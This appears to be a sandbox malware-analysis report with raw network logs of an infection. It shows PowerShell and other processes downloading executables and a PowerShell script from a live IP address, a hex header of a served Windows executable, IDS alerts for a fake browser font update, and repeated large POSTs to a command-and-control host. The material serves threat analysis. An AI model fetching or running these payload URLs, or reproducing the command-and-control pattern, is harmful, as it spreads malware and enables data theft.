            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:07:09 GMTETag: "49c00-629dc654be596"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /infopage/oung.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/oung.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/oung.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/oung.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49724 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49722 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49728 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49729 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49723 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49725 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49726 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49730 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49727 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.195.241:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RFHAG1EV9SGJF3PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QZFPW1XF9RT4L83User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15059Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZT0EBBFSKA5FORKR2GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20244Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XDCI16EBE26VJHTU8DLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XEBG0L3PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B2IOVM6I5P62J56QYWCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589130Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2DGZLGRS1W8I0K7T2QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15077Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NYG34FC09User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20190Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K8JYRBZ00Y8FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6JZILERQMQWI51E14User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589118Host: volcanoyev.click
            Source: global trafficHTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/oung.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/oung.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/oung.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/oung.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficDNS traffic detected: DNS query: volcanoyev.click
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanoyev.click
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000054D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.000000000570B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.000000000588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004B94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
            Source: powershell.exe, 0000001B.00000002.1650397592.0000000004CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/inbg.exe
            Source: powershell.exe, 0000001B.00000002.1650397592.0000000004B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/oung.exe
            Source: rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1590146059.0000000006F00000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1589736864.0000000006C40000.00000004.08000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.1585657920.0000000002A35000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1590146059.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000002.1465167659.0000000005689000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1463789836.0000000005689000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464518391.0000000005689000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1463679254.0000000005687000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000002.1465082354.0000000005644000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464006054.0000000007394000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464238134.0000000007321000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1463828600.0000000005689000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464826032.0000000005641000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464710519.000000000563E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469644779.0000000000AA1000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469201555.000000000069C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469076585.0000000000699000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469124169.0000000000699000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1470181179.000000000069D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469013140.0000000000697000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ybfh.ps1
            Source: powershell.exe, 0000000F.00000002.1628755602.0000000006D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ybfh.ps1U
            Source: powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005E1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.448
            Source: powershell.exe, 0000001B.00000002.1670598769.0000000006FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 00000014.00000002.1578974277.0000000007929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro:b
            Source: powershell.exe, 0000000F.00000002.1601052768.0000000000808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro?
            Source: powershell.exe, 0000000F.00000002.1629065195.0000000006D95000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1579325198.00000000079BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
